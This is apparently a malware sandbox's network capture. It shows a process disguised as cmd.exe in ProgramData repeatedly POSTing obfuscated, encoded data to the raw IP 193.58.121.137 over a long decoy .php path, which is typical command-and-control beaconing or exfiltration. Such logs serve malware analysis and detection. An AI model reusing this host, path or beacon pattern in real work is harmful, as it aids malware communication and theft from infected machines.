                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:45.070342064 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:45.421741962 CET2560OUTData Raw: 5a 54 59 5a 59 43 5a 52 5a 5c 55 51 59 57 54 56 56 5a 5d 44 50 51 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZTYZYCZRZ\UQYWTVVZ]DPQZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F+^3.:%62/7<-/P)$6Q$>%)3 .5:"'(-'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:45.729258060 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:45.865762949 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:45 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  72192.168.2.450081193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:46.002002001 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:46.357141972 CET2560OUTData Raw: 5a 55 5c 5f 5c 43 5f 55 5a 5c 55 51 59 57 54 5a 56 5c 5d 44 50 52 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZU\_\C_UZ\UQYWTZV\]DPRZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(&>9Y%!1Z(](7T<6P%)R=0 :%2#$/V+'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:46.671683073 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:46.809292078 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:46 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  73192.168.2.450082193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:46.939589024 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:47.294778109 CET2560OUTData Raw: 5f 5e 5c 53 59 43 5f 50 5a 5c 55 51 59 59 54 53 56 5e 5d 45 50 5c 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _^\SYC_PZ\UQYYTSV^]EP\Z[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F)33X$!&7%<Y+>?T(.V&..= /.274?S<-'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:47.571274042 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:47.717634916 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:47 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  74192.168.2.450083193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:47.845408916 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2552
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:48.224891901 CET2552OUTData Raw: 5a 52 5c 59 5c 43 5f 52 5a 5c 55 51 59 5e 54 52 56 5a 5d 40 50 56 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZR\Y\C_RZ\UQY^TRVZ]@PVZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%<03&=)%7*2<>=?T<6P%X%*+[-C&#';U+-'_!%Y)#
                                                                                                                                  Jan 3, 2025 20:48:48.470125914 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:48.601258039 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:48 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  75192.168.2.450084193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:48.848701954 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:49.201150894 CET2560OUTData Raw: 5f 50 5c 52 5c 40 5a 51 5a 5c 55 51 59 56 54 53 56 5c 5d 48 50 5c 5a 5f 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _P\R\@ZQZ\UQYVTSV\]HP\Z_Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+ 0$-&149X'<?,+'9%>%T*3_:7';S?'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:49.538568974 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:49.668468952 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:49 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  76192.168.2.450085193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:49.795551062 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  77192.168.2.450086193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:50.066179037 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 1884
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:50.419826984 CET1884OUTData Raw: 5f 56 59 58 5c 47 5f 57 5a 5c 55 51 59 5d 54 56 56 50 5d 43 50 51 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _VYX\G_WZ\UQY]TVVP]CPQZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+33^3.)1%2<Y<$(6V&*$-%)743V<='_!%Y)+
                                                                                                                                  Jan 3, 2025 20:48:50.695255041 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:50.824423075 CET380INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:50 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 152
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 09 1e 26 11 25 26 20 19 27 38 3f 55 33 3a 36 52 28 3c 09 06 2e 22 3f 00 22 03 20 0a 3d 0a 38 5c 3d 01 3c 5c 21 2f 31 0c 22 3f 3d 12 3f 2a 23 5b 03 1d 22 13 22 21 32 5b 31 39 2d 5b 3b 1e 33 1a 32 13 39 1d 3c 00 31 50 34 07 36 55 35 00 3b 0c 38 30 26 01 30 02 30 02 3c 3d 08 59 33 2f 21 51 00 10 39 1d 27 0d 36 04 27 3c 07 01 26 3d 21 58 30 35 38 07 22 2f 26 1b 25 3b 25 5b 2f 32 06 1e 25 0c 23 0e 35 30 37 07 29 5f 29 50 25 11 22 5f 2a 01 20 52 00 31 5c 51
                                                                                                                                  Data Ascii: &%& '8?U3:6R(<."?" =8\=<\!/1"?=?*#[""!2[19-[;329<1P46U5;80&00<=Y3/!Q9'6'<&=!X058"/&%;%[/2%#507)_)P%"_* R1\Q


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  78192.168.2.450087193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:50.186923981 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2552
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:50.544574976 CET2552OUTData Raw: 5a 56 5c 5f 59 42 5f 51 5a 5c 55 51 59 5e 54 50 56 51 5d 49 50 50 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZV\_YB_QZ\UQY^TPVQ]IPPZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F(/'9Z%761[?-8(B&U2>)=3Y,5! 4/R?'_!%Y)+
                                                                                                                                  Jan 3, 2025 20:48:50.814026117 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:50.945132017 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:50 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  79192.168.2.450088193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:51.913532019 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:52.263398886 CET2560OUTData Raw: 5f 55 5c 5c 5c 46 5f 52 5a 5c 55 51 59 56 54 52 56 5d 5d 43 50 55 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _U\\\F_RZ\UQYVTRV]]CPUZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+33^&>1&!X&?4](=;T('%&)4:5 <'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:52.611696959 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:52.756004095 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:52 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  80192.168.2.450089193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:52.880959034 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:53.232491970 CET2560OUTData Raw: 5a 51 5c 5a 5c 47 5a 56 5a 5c 55 51 59 59 54 50 56 5f 5d 45 50 55 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZQ\Z\GZVZ\UQYYTPV_]EPUZ[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+3,01Y'76&<Y+<?&Q$=&)U?X-743<='_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:53.503725052 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:53.636322975 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:53 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  81192.168.2.450090193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:53.772481918 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:54.126055956 CET2560OUTData Raw: 5a 56 5c 5a 59 45 5f 51 5a 5c 55 51 59 5b 54 5a 56 5f 5d 44 50 57 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZV\ZYE_QZ\UQY[TZV_]DPWZ\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%)#;'6%Q"&/3?.;V+'!2&(3?_:*7'3<'_!%Y)3
                                                                                                                                  Jan 3, 2025 20:48:54.435530901 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:54.582725048 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:54 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  82192.168.2.450091193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:55.016572952 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:55.373459101 CET2560OUTData Raw: 5a 56 59 58 5c 41 5a 54 5a 5c 55 51 59 5a 54 54 56 5b 5d 43 50 57 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZVYX\AZTZ\UQYZTTV[]CPWZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%) ']'==21Z([+-($W1=>=#7^-%:"'<?'_!%Y)7
                                                                                                                                  Jan 3, 2025 20:48:55.722199917 CET25INHTTP/1.1 100 Continue


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  83192.168.2.450092193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:55.832612038 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 1884
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:56.185509920 CET1884OUTData Raw: 5f 5f 5c 5d 5c 43 5a 56 5a 5c 55 51 59 58 54 55 56 5b 5d 44 50 50 5a 5f 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: __\]\CZVZ\UQYXTUV[]DPPZ_Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%G+0<$=:%9X1Z#(P)426=0,-6%Y Q0('_!%Y)?
                                                                                                                                  Jan 3, 2025 20:48:56.489723921 CET405INHTTP/1.1 100 Continue
